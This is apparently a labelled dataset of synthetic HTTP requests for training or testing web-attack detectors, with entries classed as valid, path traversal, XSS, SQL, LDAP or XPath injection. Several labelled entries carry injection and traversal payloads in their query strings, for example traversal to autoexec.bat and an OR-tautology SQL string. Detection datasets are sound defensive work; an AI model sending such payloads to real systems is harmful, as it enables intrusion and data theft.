Proxy-Authorization: NTLM ZTlyb3RJN3hybWVhdHBkYVVhbzVhbjB0YTZydmV0cWhzaXJsZmVFdWl3aWl6eWlm
Authorization: Basic dGxwcGFlcjplc2kyeHJ2
Range: -0
Referer: http://fooer9ny.it/4onsidsn.jsp
TE: trailers,gzip;q=0.7,chunked
Trailer: Via
User-Agent: Mozilla/0.9 (X11; U; SunOS sun4u 9.4; zo-il; rv:1.6.4) Gecko/22579924
UA-CPU: x86
UA-Disp: 7139,4412,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8027x0405
Via: 1.8 185.239.133.174, 4.2 145.14.210.115:7642, FTP/9.0 33.98.251.163
Transfer-Encoding: identity
Upgrade: daa/6.7
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 157.146.253.229
X-Serial-Number: 6772472077190177266
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18649
Start - Id: 1826
class: Valid
GET /ogoaaRoyoeT.htm?le5gig9w=24&wJq33QcvBa0s=095UnoMw&adyteoldaly=8815885054&Uiu706_w=ne&mcmddb5Llqn=ashutdownes%28&1untgcul=+cemacsD&tqlFdiAy=yqhwfDn027&temsboe8ops3=ephp+re&fnad9i7ouo=47141&iE7sereeaqato=aec%7Cl+&seeertddjvxe=i_ra0oMX&dtt=aeAwdusuaie&c0vboot.iniO1Gp-Sxs=t&leiesofTumw=117232&tGets=e3 HTTP/1.0
Host: 114.53.44.6:44
Connection: uhii2
Accept: text/*;q=0.6
Accept-Charset: iso-2022-jp;q=0.9, x-mac-chinesetrad, windows-874;q=0.3, x-mac-hebrew
Accept-Encoding: 
Accept-Language: mn-hi7
Cache-Control: cbhz='e1'
Client-ip: 97.64.37.35
Cookie: detJNoonhz=515225;dnhcsMlh=boMi0is;nq=te;fhuwaNtr=13
Cookie2: $Version="47"
Date: Thu, 27 Oct 05 15:36:50 GMT
ETag: "j@CxBIw8ue7tt-v"
Expect: asReiisa=mLvton2a
From: etiimsr@2ilc8.de
If-Modified-Since: Fri, 02 Feb 07 17:35:24 GMT
If-Unmodified-Since: Fri, 19 Jun 09 05:36:06 GMT
If-Match: *
If-None-Match: *
If-Range: "8DTy-_5229-W8pexUo"
Max-Forwards: 2
MIME-Version: 3.1
Pragma: tnuZtd='aiLsttc'
Proxy-Authorization: NTLM Yzd0MGhYc25oaDhudDgwcmVhdGVublZld3VkYWFjbGlvZnQ=
Authorization: Basic ZVBFb3JhOm5lbk9ERA==
Range: -1402,47341-
Referer: /l27iie.tiff
TE: deflate,gzip;q=0.7,trailers
Trailer: Warning
User-Agent: rejdrt/9.8.8
UA-CPU: x86
UA-Disp: 0564,279,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 289x684
Via: 5.7 www.8iedu.png, 4.8 73.114.180.229:5942
Transfer-Encoding: compress
Upgrade: mntn/9.1, 8tme/6.2, rRoA/2.8, jle/4.8
Warning: 613 www.Hxowi.gif "ooxsXtuvN0ccdOg4eio" "Mon, 26 Apr 04 22:54:11 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1826
Start - Id: 45824
class: PathTransversal
GET /bnilfsXmcwhmuBhosOe.js?passwd-H4VY4=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&afor4ydO9i7x=Yweoyin HTTP/1.0
Host: 172.69.149.173:80
Connection: keep-alive
Accept: application/*
Accept-Charset: iso-8859-15, iso-8859-7, x-mac-hebrew;q=0.5, x-mac-korean;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=0285
Cookie2: $Version="357"
Date: Sun, 25 Jan 04 19:01:42 UTC
ETag: "h.CQTk1LWjNJ12m-P1ot"
Expect: tons32
If-Modified-Since: Sun, 28 May 06 20:36:37 UTC
If-Unmodified-Since: Sat, 06 Mar 04 08:55:29 GMT
If-None-Match: *
If-Range: Mon, 04 Apr 05 08:34:55 CET
Max-Forwards: 402
MIME-Version: 9.7
Proxy-Authorization: NTLM YXJhZmpjaHJlemlsZWNwbXJ0YXVuc2VlaUF0YWQwRXNSb3R5Y2w=
Authorization: Basic ZWNocmI6ZUhzZ3ZFemc=
Range: 09236-
Referer: /eiiety/arusagog.zip
TE: gzip;q=0.4,gzip;q=0.8
User-Agent: Mozilla/1.5 (compatible; Konqueror/2.6; Win 9x; itih5obhp)
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
Transfer-Encoding: 90jj; wrpOnS=sugt
Upgrade: oeqAi/2.8, azod/4.0
X-Serial-Number: 25397478987579

null

End - Id: 45824
Start - Id: 30079
class: Valid
GET /pLdAtjTS94nsV2PM4.y/cMIadmintFmLgm/s7-fm6VTyy_F15z0/r3/o1tcx8Qe/bhltnoGabcosop/aU/x0I/dEoen/ftehia/aywg.P3.png?Nitetkl7cn=pg0g&Q5@K5=%40ei&lsrEe=shavingadmintNn7&cth2narf=l_Eky&Zi6atlX6P=qtioela1&hchnlhiEh=mG-AAEd5yPh1&E2jD=2309&hfOX1=883345656&csetqsvlanqiwT5=%40rnntBwo%40oelD+t&Uenooonqo3ijen=m09&oH1vu=yhne+ajort8httpta&etbeOijsireth=9&RIJbq3=5387247 HTTP/1.0
Host: 54.92.69.36
Connection: keep-alive
Accept: application/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 180.227.86.137
Cookie: jdeletenodeWWQKUA8=dUH-KCHcWU;nwB0bin=yz5hG;9e@P1Xconnectdl=axkonp?ccfodhtpassor;n1Ne=aXY5ntFF;t5gd5EElpa=3
Cookie2: $Version="551"
Date: Wed, 28 May 08 05:21:07 UTC
ETag: "2MFawnDttmw-C.r"
Expect: 100-continue
From: uaHi@yedijoahj.de
If-Modified-Since: Fri, 04 Aug 06 05:54:15 CET
If-Unmodified-Since: Mon, 04 Jun 07 23:34:48 CET
If-Match: "J7v3coUWYfLZIp8uv-e"
If-None-Match: *
If-Range: "2OnEVx05FQbQusjqMEa"
Max-Forwards: 974
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM OXJlZWludHRoNG5vYXJsZWdvbEViYW9OeWM4Ym5VY25kdmFj
Authorization: Digest response="d7a0Ead56789aaeff9CA6DEaC40BAbc3"
Range: -551
Referer: /sreitb/u9ydybn/aAeduos.msf
TE: chunked
Trailer: Upgrade
User-Agent: 88oitt1wtthsiTy
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x0520
Via: 3.7 121.244.135.16
Transfer-Encoding: gzip
Upgrade: wteear/7.0, siaf/7.6, vawdDs/3.7, isedd/5.7, tns/6.0
Warning: 922 172.195.36.87 "f6tmena1" "Fri, 19 Dec 08 22:12:57 CET"
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 44435444957
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30079
Start - Id: 12814
class: Valid
GET /1qdIoaac.gif?p5hau=0449&tOlcxi=+&JA40H0m=zi&Snmy2NntadbDa=c4N3e2-5jzYz&x5yweviiSU=c+xdtuhcu%2Bhsobjectatwq&t3al=ym%24wpn9a&_Ym4JchildCdx=955182&hgikHgh8hSo=ou5%5C9htpasstwindow.openf&Cba=fDvel%2Bbd%3C70uems&iy3hinzoirnainh=p03oemeOwDc HTTP/1.0
Host: 117.15.217.225
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate, deflate
Accept-Language: *
Cache-Control: max-age=252
Client-ip: 104.144.236.15
Cookie: Aeg=7557865;bJ9WTo=taUauatesAtti
Cookie2: $Version="827"
Date: Mon, 22 Sep 08 03:23:45 CET
ETag: W/"OC3Mp1v8cvCtQtamre"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Wed, 13 Sep 06 14:43:32 CET
If-Unmodified-Since: Wed, 25 Feb 09 16:01:54 UTC
If-Match: "P5U_pHiaTMS1sqsJc"
If-None-Match: "QkgLkd2j8zorKrq9"
If-Range: Thu, 20 Apr 06 20:00:33 CET
Max-Forwards: 4
MIME-Version: 8.3
Pragma: pMcshzue='0Stb'
Proxy-Authorization: Basic ZG5ub25pOmlwc0R5
Authorization: eaesh ttharte=Seynbho3
Range: 880687-,10-
Referer: /insacssd.sh
TE: deflate;q=0.0,trailers
Trailer: Accept-Charset
User-Agent: 7xrsdayyt (xxxlSs7; vkLOcj7i; n.fC6Ej; h7P1OHw)
UA-CPU: MIPS
UA-Disp: 3127,7217,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8634x945
Via: HTTP/9.7 www.a2totu.html, 1.7 133.7.199.120, 6.6 www.snUodhn.shtml
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 494 130.146.46.121 "atTyo" "Sun, 05 Oct 08 10:26:05 GMT"
X-Forwarded-For: 129.36.3.102
X-Serial-Number: 392683968
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12814
Start - Id: 47776
class: XSS
GET /jtRECYn2S9LtkQ-3wsox/eBY7Cql7sy8zw/rIJlWckzwrUNe.MZ4F/fnsztasIDntlrseol/n9n1/rMq7UnOiV3lXlv/s03nLF7m/so5aEFUe4oevRr.php?ot=en%25ha&b9lsqiror=%3Cstyle+type++++%3D+%22+++++text%2Fjavascript%22%3E%5Balert++++%28%27lonN%27%29%3B%5D%3C%2Fstyle+++%3E&si5r=za8gE5d..E. HTTP/1.0
Host: www.rntwe94HnA.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: u-modmuaL, ueoIwhne-mgeno, sa-en, gsi4g-sOoe, ttws8-wniao
Cache-Control: max-stale
Client-ip: 225.168.147.79
Cookie: rDsoeneo=6;hn=oUw1m
Cookie2: $Version="49"
Date: Sat, 17 Nov 07 16:49:12 UTC
ETag: W/"Nxww7jHnVW6-iC@KeH"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Wed, 08 Sep 04 05:28:35 GMT
If-Unmodified-Since: Sun, 13 Dec 09 24:37:39 CET
If-Match: "C7nb7P2qzdU4-KD.9"
If-None-Match: *
If-Range: "y4lnVD3XXfxyNn.Kvdx"
Max-Forwards: 67
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: ynhmte fnet1=f4tno
Authorization: Basic ZWliYmFyeGU6aVI4Ym9yYg==
Range: 2672-661117
Referer: http://oanJesse.ch/de7ysfo/nhastaGh/vyEr4hn.tar.gz
TE: chunked,deflate;q=0.4,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/8.2 (compatible; Konqueror/9.6; Open BSD i386; i8acgGmm)
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: 9.1 www.eTrrb.htm
Transfer-Encoding: gzip
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 289 www.y4tieh.html:6480 "Sn3nNaak3avt" "Sun, 06 Sep 09 14:49:12 CET"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47776
Start - Id: 28118
class: Valid
GET /jxntuoaa/G4LdXBYsj/05KBpg0wIt/vp/lgmHQs/Slliy/ito/sfrererllrmtAydm/etNnohmdlyZ.asmx?faJupdateR9=iRcXkh&kaczueu=rKsYSd-8sv6&mochaLxp_4Y3V=10377&Ei=t5yoe8tZlXz0eCie&ejrneu1=kgxtse&tuthNanr=znraeoOfar5&Rc7i2neyxo3os=%28toq&VxobjectvVp7FuazP=ecer&aEi0=7863532523 HTTP/1.0
Host: www.ddajoo.net:661
Connection: uAtlvZ
Accept: audio/*;q=0.2, audio/*;q=0.7
Accept-Charset: euc-jp;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 219.78.190.9
Cookie: hsr=2650680;acmstyle6XLDTo=88800762
Cookie2: $Version="0"
Date: Thu, 16 Aug 07 09:18:12 UTC
ETag: W/"iHQda_C-FUBqOY_S"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Mon, 29 May 06 08:44:13 CET
If-Unmodified-Since: Sat, 26 Feb 05 09:27:08 CET
If-Match: "M67RJ5MUpyL2vOujA5"
If-None-Match: *
If-Range: "HgQ_1_heVaRS.NZx9"
Max-Forwards: 3
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic ZWV5ZW5kOlJIdGRlZWU=
Authorization: NTLM NGkzc2E0MXRlN2llc29OMG1lSGFpbW1nbnFzdmxpYXRuZ3FlYXRMaQ==
Range: 0-
Referer: /bpfon/ncusec.exe
TE: chunked;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.8 (X11; U; Linux i586 7.9; rn-oo; rv:7.3.0) Gecko/31964016
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4261x691
Via: 8.4 www.0atA.gif, scte9/7.7 www.iitneao.gif:6104, 1.1 40.25.149.58:208
Transfer-Encoding: iwgeoi
Upgrade: laa/1.4
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 3455337535861229
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28118
Start - Id: 37179
class: LdapInjection
GET /rpb@6j0daVMBA1yXZHP_/eaow/VM/sdrutEieas/dM/7itn0easorssoeoidt5e/eQ-/6m2/LxCdivXCXlog-@JPz/unc8ubrtstgl.pl?DEsesaneob=5&rr8n4hew8nhHoFk=aE3+1&lnuea=mrIoofunxeal+ir&ooErOesOr=05624&eva0sdoonab9s=20&enande=%29%28+%7C%28displayName%3Dhad*%29+%28name+%3D+++had*++%29%28mail%3Dhad*+++%29&ozG2sxast=qS2&hs=etmtc26Hhnnicfnkrp&6esLgw=710 HTTP/1.0
Host: 124.15.123.117
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.5
Accept-Encoding: 
Accept-Language: dn8oixlw-b3izr
Cache-Control: min-fresh=7
Client-ip: 105.61.31.124
Cookie: itHDspcrdafb=zsl
Cookie2: $Version="6"
Date: Sun, 10 Sep 06 02:06:03 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: 100-continue
From: aheoexc5@cnna.gov
If-Modified-Since: Sat, 25 Aug 07 12:13:10 UTC
If-Unmodified-Since: Wed, 11 Jul 07 14:33:38 UTC
If-Match: *
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 77
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest username="fttllaoe"
Authorization: Basic d2FabDpUZWh0YmY=
Range: 0-
Referer: http://hdaer.de/H3d9bs.php
TE: deflate,deflate,chunked;q=0.8
Trailer: Max-Forwards
User-Agent: nsy2ut (abcjG2cT; 7nJ5EX5l; i0s0o3yvC; bWyGQbW)
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: deflate
Upgrade: vtLqpc/5.6, rwtot/2.1, ahfxu/1.7, se1/6.7
Warning: 419 www.oe4ei.jpeg "oeecaegei0asnitnozib" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 175208593
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37179
Start - Id: 49543
class: XPathInjection
GET /1NAM/513e7AqsfhSR_Z/ayM1QzwQ1Rrde/t@ZRgJ0a/osvtd7asDfhVefawc/lms3CXHDzMOYBh5/fijstt/Jjgz0G/nPW5qLxYMGV66EQKARl.jpeg?tElrfndyv3al=ditrro&dtvwTjgyt=780390219&cwpdrt23atieLtr=+etc%29sbdUasraa+9et&nlooihnittekSN=qr70zngd&ytSnohhsCi=i6y&Lr3=emrOnftpaOeM&pNi=ce%27+++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++%27mnoerog%27+++%3D+++%27 HTTP/1.0
Host: 5.15.143.34
Connection: u9Acmas
Accept: */*;q=0.5
Accept-Charset: iso-8859-1;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: p0lndb-riEsotcR, ec7rE-tahf;q=0.7, e-1hmf0;q=0.2, aeihheac-asmicuo
Cache-Control: no-store
Client-ip: 74.98.44.206
Cookie: OPrE0Gp7uETf=mhlnktr8wutldeldoy;unurue=7417;i2E9titli7if7=adshome;eLie2Qx=>
Cookie2: $Version="293"
Date: Mon, 26 Jun 06 20:23:34 CET
ETag: "-RjzUPDGi0.zC78Rw@4@"
Expect: kstooage=pcDs
From: wirtsy@nexe4eht.ch
If-Modified-Since: Wed, 12 Apr 06 06:02:55 UTC
If-Unmodified-Since: Sat, 29 Sep 07 22:20:32 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Mar 06 07:57:31 UTC
Max-Forwards: 0
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cm1Cbm5naWx0Y2FzcEdob3RyYTJrbDBlOW5udWNlZXJiY29ibnN1c2FzeW9hemM=
Range: 7-1,-171
Referer: http://ChngHeoi.cz/yUiazSBh/Y21aa4rd/eles/niqt.png
TE: gzip,deflate,chunked;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/9.3 (Windows; U; WinNT 7.1; sd-ly; rv:2.8.6) Gecko/39710245
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4014x885
Via: 7.9 76.50.16.167
Transfer-Encoding: thev
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 84222466016930
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49543
Start - Id: 46338
class: PathTransversal
GET /lfD6PMP7sTxOm/Mi_Vfv1bnN/Ohsnng.jpg?aDgetle=t%3A%2F.htaccess%7E&he=dVnw0l%40fa&Ey=%7C9sA HTTP/1.0
Host: 130.184.9.46
Connection: close
Accept: image/jpeg;q=0.0, image/png;q=0.4
Accept-Charset: iso-8859-9, x-mac-chinesesimp, iso-2022-jp;q=0.0
Accept-Encoding: *
Accept-Language: laaeo-iNt;q=0.0, o-a6Icoelh;q=0.9, enhts-imrpt
Cache-Control: no-transform
Client-ip: 142.8.138.99
Cookie: hbsn=37;tqVrncmmfiaw=a;etcO3kz=537845;6ojOh0=2ela;imgDfromfnXeua=isao
Cookie2: $Version="16"
Date: Tue, 07 Dec 04 11:14:55 UTC
ETag: "GqBiplHCipnTB_JNhgiU"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Thu, 17 Nov 05 09:47:56 UTC
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "kuWzHXTzh7UY.N64"
If-None-Match: *
If-Range: Sun, 16 May 04 02:57:59 CET
Max-Forwards: 6665
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: josyh eeusucc9=tlhwlepi
Authorization: Basic bWFwNXNnZjpkYXNvbg==
Range: -282967,968090-1346,1029-352
Referer: /0iuchDs/h2hifhm/sseeaj9a/wn6rmpl3.css
TE: trailers,deflate;q=0.1,trailers
Trailer: If-None-Match
User-Agent: reu2t7o3a7xaOs
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3713x610
Via: 5.0 www.aj70ien.gif, HTTP/6.8 140.239.252.219, HTTP/5.1 186.107.254.38:997
Transfer-Encoding: compress
Upgrade: zetne/3.4, eeirz/9.6, roaisl/4.6, ikirr/2.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 252.174.195.68
X-Serial-Number: 33688817267765601
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46338
Start - Id: 3847
class: Valid
GET /3Otob/sgTSIw.fJS10cRy9.6e5/rIl@AXvB.c-yDdHwG.shtml? HTTP/1.0
Host: 147.118.200.46
Connection: close
Accept: audio/basic;q=0.8, audio/*;q=0.6, image/png;q=0.5
Accept-Charset: hz-gb-2312;q=0.6, euc-jp;q=0.7, euc-kr, macintosh, windows-1253
Accept-Encoding: identity
Accept-Language: migk-teta8l;q=0.1
Cache-Control: only-if-cached
Client-ip: 192.184.71.53
Cookie: aoiWUz=i<;me=>eyrm;mererlenDneesa=priemTezied
Cookie2: $Version="105"
Date: Mon, 05 Apr 10 02:56:03 UTC
ETag: W/"PKrfLJ6Gsklhj61ds"
Expect: nbebn1wt=a6eje
From: N8otdyin@xnevet.de
If-Modified-Since: Thu, 11 Oct 07 19:52:21 GMT
If-Unmodified-Since: Mon, 23 Jul 07 19:26:44 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Dec 06 03:57:16 CET
Max-Forwards: 224
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: zoctyi 7aisneR=e096hns
Authorization: NTLM dGVlSmlpckR3NG9zbnNUaWFlYWFpOXdudG5vN25tbHJtaGxPSTlpRmU=
Range: 706-48,3-8712,-3
Referer: /lyfas1.asp
TE: chunked,trailers,trailers
User-Agent: Mozilla/8.8 (compatible; irIAi; Unix; rjaS32anct)
UA-CPU: 68000
UA-Disp: 9985,6519,16
UA-OS: Win95
UA-Color: color32
Via: mmonx/3.3 www.neob.jpeg
Transfer-Encoding: gzip
Upgrade: eeyd/1.5, nTs9te/2.1, tdqnc/6.5
Warning: 584 www.iahsed.jpg "oi5d" "Wed, 25 Jul 07 08:26:14 GMT"
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3847
Start - Id: 18137
class: Valid
GET /tf7hCIoTf.sh? HTTP/1.1
Host: 161.91.3.194
Connection: eenrsor
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 165.189.39.9
Cookie: tT=Neekfromloe7
Cookie2: $Version="59"
Date: Sun, 19 Apr 09 21:53:47 CET
ETag: W/"8gDiVI4878MrhqFEe"
Expect: Utfnw=cn4c;cent
From: Rcsghasd@4n7te.ch
If-Modified-Since: Fri, 13 Aug 04 24:04:03 UTC
If-Unmodified-Since: Sat, 14 Oct 06 06:53:11 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 990
MIME-Version: 3.6
Pragma: h=E7t0ndes
Proxy-Authorization: Basic NWFvOGdmOmd0Y3Fh
Authorization: Basic bkRVaGxzdDpvdHRlbXlmaA==
Range: -69064,75-37,650952-
Referer: http://xOcaide.be/fqawtli.nsf
TE: trailers,deflate,trailers
Trailer: From
User-Agent: hash2i0emu (jBBwIo; ocbcuJtYB; 4ZugY5; rhBfAzT5bg)
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4181x6520
Via: FTP/3.3 211.251.1.239
Transfer-Encoding: identity
Upgrade: EqxgAe/7.5, mwiE09/4.9
Warning: 683 133.85.16.41:57048 "aEtal" 
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 1346514779
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18137
Start - Id: 28701
class: Valid
GET /Een/nNUsp/r.blUSD3PyYJgCc.cgi?ojro=749989626&Fg4Eku=70289232&dksiTbdeo0Mt=+a&tT4=clinkvt&SsvgNl=609549536&ts7jsxq=+&a7=1649288&cfitce=g8qVb&ua=5963&winstbs=sfxjZdE HTTP/1.1
Host: www.saheMatKL.org:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.8, cp-932;q=0.0, x-mac-hebrew;q=0.3, iso-8859-5;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 80.241.83.170
Cookie: diuo=iyiQv6FgCC9p
Cookie2: $Version="41"
Date: Wed, 24 Jan 07 19:01:54 GMT
ETag: "EsNhD0x-L@yMl16"
Expect: 100-continue
From: peAR@mnttien1At.ch
If-Modified-Since: Fri, 02 Jan 09 13:34:56 UTC
If-Unmodified-Since: Wed, 03 Nov 04 11:57:10 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 10:58:54 UTC
Max-Forwards: 732
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest response="402fAbe20bCA7521de8FBa324bDF8Af8"
Authorization: Digest uri=http://a5hemp.biz/lOou4/hetqu/Sblr9ecp.txt
Range: -440021
Referer: http://www.uaec.ch/ezeoe/inrnti/anearr/x1am/1odhPi2t.png
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: medN/4.3.9.8
UA-CPU: 68000
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: 6.4 28.151.233.53
Transfer-Encoding: identity
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 669 www.arAn.jpg "e3btqt7scal3asb" "Tue, 04 Nov 08 19:20:43 GMT"
X-Forwarded-For: 70.75.45.186
X-Serial-Number: 244229732731
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28701
Start - Id: 42284
class: SqlInjection
GET /QnydZIu0w/Reipn/tXvedmNq-mcLp1OX/uaetS6alBu1RtNosi8n/exG.I7hmNectrUbUMR/eqCxlMWp4/unZHP0neNla3/cab4q0nnnecebslsneOn/r95AE45/nh8aeoL/aUbUB.html?eteEioior=OR+%27aaHcno%27+%3D++%27Sim%27%2B%27ple%27 HTTP/1.1
Host: 78.80.230.73
Connection: dno4WfeD
Accept: */*;q=0.1
Accept-Charset: iso-2022-kr;q=0.7, iso-8859-9, iso-8859-5;q=0.8, hz-gb-2312
Accept-Encoding: *;q=0.5
Accept-Language: rfhti-3uueeys1
Cache-Control: no-transform
Client-ip: 208.207.204.31
Cookie: odshhisdio5=5xlQqQ;snz=zohprlmgehh;;Sa2acds8dtlotsb=satmys;8fwem=mb7eEi4dtbduQpfeti;ft5dltprg1adA=ts;sbpgxtllwtfcd=ehmyye ynswemg 0-r
Cookie2: $Version="134"
Date: Thu, 05 Jun 08 08:50:06 CET
ETag: "R5X6Mr66Uc_-mrSq2"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 19 Oct 09 12:27:00 GMT
If-Unmodified-Since: Sun, 12 Aug 07 07:55:00 CET
If-Match: "z1v15j0LX0uM1IunVe"
If-None-Match: *
If-Range: "6kNai0wxdgBmfbZ"
Max-Forwards: 072
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: NTLM YkN0dGFpb3ViSHFlaG9odmhsam5wcm83d2VoaXRubDN0c3FvZjVxcg==
Range: 24169-,44-6,-41
Referer: /ntsh.php4
TE: gzip
Trailer: Upgrade
User-Agent: 8elt (rmDm2SA3; h9z4XA_D8; t2n4b_Zl_)
UA-CPU: 68000
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5265x544
Via: lJI2ts/8.9 www.SImcoEy.tiff:4638
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 903 www.csrnc.htm "rrsgh4khsra2oarcq2na" 
X-Forwarded-For: 27.160.160.90
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42284
Start - Id: 11077
class: Valid
GET /oihOotesSrtTrnsk8nt/FSqElz/pu-/inhttpQBBwBI2sC/w0zH.swf?Jyvarw3=2&kaeTgjet=esdso&rdksryetz=9441557&rmuibes9yats=ahn7rP&window.open.mail7BNall=i%40fCS-HLIc HTTP/1.1
Host: 4.22.2.140:6
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.0, deflate;q=0.6, compress;q=0.4, gzip, compress
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 214.74.209.201
Cookie: zndDsoeeoacw=~ss[nlsA:zg(d
Cookie2: $Version="39"
Date: Sun, 12 Feb 06 19:47:28 GMT
ETag: "LHFQXTS-rxzVKatC"
Expect: 100-continue
From: caOa@nautia.org
If-Modified-Since: Fri, 11 Mar 05 19:04:06 GMT
If-Unmodified-Since: Wed, 11 Mar 09 17:37:05 GMT
If-Match: *
If-None-Match: *
If-Range: "CioPEEvGHs6.LA6_WP0Z"
Max-Forwards: 4
MIME-Version: 7.0
Pragma: no-cache
